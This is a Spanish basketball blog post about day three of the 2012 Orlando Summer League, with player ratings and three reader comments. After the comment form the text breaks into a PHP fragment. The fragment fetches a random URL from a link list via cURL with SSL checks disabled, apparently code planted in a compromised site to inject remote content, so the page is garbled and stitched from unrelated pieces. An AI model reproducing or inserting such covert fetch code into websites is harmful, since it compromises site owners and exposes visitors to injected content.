Orlando Summerleague: Día 3

12 de July de 2012 por txusma

Día de ausencias. Perry Jones, Mo Harkless y Arnett Moultrie no se vistieron y se tuvieron que conformar con ver a sus compañeros desde el banco. Por su parte, Jeremy Evans nos dejó todo un recital de jugadas espectaculares. No os perdáis el resumen de su partido.

Destacados

Jared Sullinger: Un día más el jugador de los Celtics demuestra que de no haber detectado los médicos una dolencia crónica en su espalda hubiera sido, probablemente, TOP-5 del draft. Su juego de espaldas al aro es sobresaliente y anoche se fue a los 16 puntos. Además cogió 8 rebotes y puso 2 tapones. Los equipos que escogieron antes de los Celtics se deben estar tirando de los pelos.

Miles Plumlee: Lo reconozco: Infravaloraba tremendamente al ex de Duke. Ayer se destapó con un gran partido de 18 puntos, 8 rebotes y 3 tapones y mostró una gran agresividad. Hibbert puede haber encontrado recambio.

Tornike Shengelia: ¿Quién? Jugador georgiano, escogido en el puesto 54 por los Sixers y traspasado a los Nets. Podríamos pensar que se mostraría algo cortado en sus primeros partidos en América pero Tornike no se amilanó y entró a canasta sin complejos. 17 puntos y 6 rebotes precisamente contra los Sixers.

Enes Kanter: Despacito y buena letra. 12-12 para el pívot turco que parece que se va encontrando poco a poco.

A seguir

Fab Melo: Jugó 12 minutos en los que anotó 2 puntos, capturó 4 rebotes y repartió 3 asistencias. Mejor producción que en días anteriores pero a años luz del jugador escogido inmediatamente antes que él en el draft.

Kris Joseph: A la chita callando la elección 51 del pasado draft va mostrándose como un jugador sólido y completo. Anotó 12 puntos,  capturó 7 rebotes y robó 3 balones.

Andre Drummond: Primeras pinceladas de lo que puede aportar el pívot de los Pistons. Aún necesita correr más y jugar más duro pero anoche nos dejó 10 puntos, 9 rebotes y 4 tapones.

Andrew Nicholson: Jugó sólo 16 minutos pero fueron suficientes para conseguir 16 puntos con un 8 de 8 desde la línea de tiro libre.

Decepciones

Brandon Knight: Falló 12 de los 17 lanzamientos que realizó y además perdió 5 balones. Reggie Jackson le pasó por encima continuamente.

Kyle Singler: Se quedó sin anotar ningún tiro de campo y fue incapaz de aportar en prácticamente ningún aspecto del juego. Malas sensaciones.

Kyle O’Quinn: La fatiga empieza a pasar factura. El jugador de los Magic se quedó sin anotar en 11 minutos de juego.

Comenta

3 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Muy interesantes estas observaciones de la summer league txusma. Gracias a tí estoy siguiendo las evoluciones de los jugadores jóvenes que participan. Buena pinta tiene este Sullinger para mis Celtics….

      Citar

  2. Esteban dice:
    #2

    altisimo nivel (para el tipo de torneo) el mostrado por al thorton, muy parejo y muy superior al resto, en realidad, jugando al nivel que deberia mostrar alguien de su esperiencia y de carrera mas que aceptable en la liga, extraño su faltazo el año pasado en la nba

    lo veo muy util en algun equipo este año, aunque despues de este torneo dificilmente se conforme con el minimo

      Citar

  3. txusma dice:
    #3

    Esteban:
    altisimo nivel (para el tipo de torneo) el mostrado por al thorton, muy parejo y muy superior al resto, en realidad, jugando al nivel que deberia mostrar alguien de su esperiencia y de carrera mas que aceptable en la liga, extraño su faltazo el año pasado en la nba

    lo veo muy util en algun equipo este año, aunque despues de este torneo dificilmente se conforme con el minimo

    Thorton no puede pedir más del mínimo, hombre. Está en una liga de rookies, jóvenes sin equipo y veteranos desesperados. Sinó destaca aquí prácticamente puede empezar a pensar en la retirada. Yo creo q no jugará en la NBA. Puede ganar más dinero fuera.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>